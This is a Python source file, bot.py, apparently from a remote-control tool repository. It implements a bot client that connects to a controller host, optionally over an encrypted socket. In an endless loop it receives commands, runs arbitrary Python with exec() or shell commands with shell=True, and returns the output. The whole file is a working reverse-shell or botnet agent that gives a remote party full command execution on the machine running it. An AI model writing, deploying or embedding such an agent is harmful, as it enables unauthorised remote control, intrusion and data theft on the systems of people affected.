summaryrefslogtreecommitdiff
path: root/bot.py
blob: 5dc4eeafc55afc122c126aec630d094eb641f148 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
import contextlib
import subprocess
import argparse
import os
import io

from typing import Optional
from typing import Tuple

from shared import DEFAULT_HOSTNAME
from shared import DEFAULT_PORT
from shared import DEFAULT_ENCODING
from shared import DEFAULT_LANGUAGE_CODE
from shared import LIBERAL_ENCODING_ERRORS
from shared import Platform
from shared import AsymmetricSocket
from shared import SymmetricSocket
from shared import Socket

class Execute:

    ENCODING      = DEFAULT_ENCODING
    LANGUAGE_CODE = DEFAULT_LANGUAGE_CODE
    TIMEOUT       = 60

    @staticmethod
    def code(code: str) -> str:
        assert isinstance(code, str), f'Wrong type: {code=}'

        buffer = io.StringIO()

        with contextlib.redirect_stdout(buffer):
            exec(code)

        return buffer.getvalue()

    @staticmethod
    def shell(command: str) -> Tuple[Optional[str], Optional[str]]:
        command = command.strip().replace('\n', ' && ')

        if Platform.WINDOWS and Execute.LANGUAGE_CODE:
            command = f'chcp {Execute.LANGUAGE_CODE} > nul && {command}'

        proc = subprocess.Popen(command,
                                shell=True,
                                stdin=subprocess.DEVNULL,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                encoding=Execute.ENCODING,
                                errors=LIBERAL_ENCODING_ERRORS)

        try:
            return ''.join(proc.communicate(timeout=Execute.TIMEOUT)).rstrip()
        except subprocess.TimeoutExpired as err:
            proc.kill(); return f'[BOT] ERROR :: {err}'

class Bot:

    def __init__(
        self,
        *args,
        symmetric: Optional[bool]=None,
        **kwargs
    ) -> None:
        assert isinstance(symmetric, bool) or symmetric is None, f'Wrong type: {symmetric=}'

        if symmetric is None:
            self.bot = Socket(*args)
            self.bot.set_conn()
            self.bot.set_middleware()
        elif symmetric:
            self.bot = SymmetricSocket(*args, **kwargs)
            self.bot.set_conn()
            self.bot.set_middleware()
        else:
            self.bot = AsymmetricSocket(*args, **kwargs)
            self.bot.set_conn()
            self.bot.set_middleware()

    def connect(self) -> None:
        while True:
            request = self.bot.recv()

            try:
                command, run = (request.get('request'), request.get('run'))

                assert command is not None, f'Missing attribute: {command=}'
                assert isinstance(run, bool), f'Wrong type: {run=}'

                if run:
                    response = Execute.code(command)
                elif command[:2] == 'cd':
                    os.chdir(command[2:].lstrip())
                    response = os.getcwd()
                else:
                    response = Execute.shell(command)

                self.bot.send({'response': response})
            except Exception as err:
                self.bot.send({'response': f'[BOT] ERROR :: {err}'})

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--hostname', default=DEFAULT_HOSTNAME)
    parser.add_argument('--port', type=int, default=DEFAULT_PORT)
    parser.add_argument('--password')
    parser.add_argument('--salt')
    parser.add_argument('--pubk_data')
    args = parser.parse_args()

    if args.password and args.salt:
        options = {'symmetric': True, 'password': args.password, 'salt': args.salt}
    elif args.pubk_data:
        options = {'symmetric': False, 'public_key_data': args.pubk_data}
    else:
        options = {}

    bot = Bot(args.hostname, args.port, **options)
    bot.connect()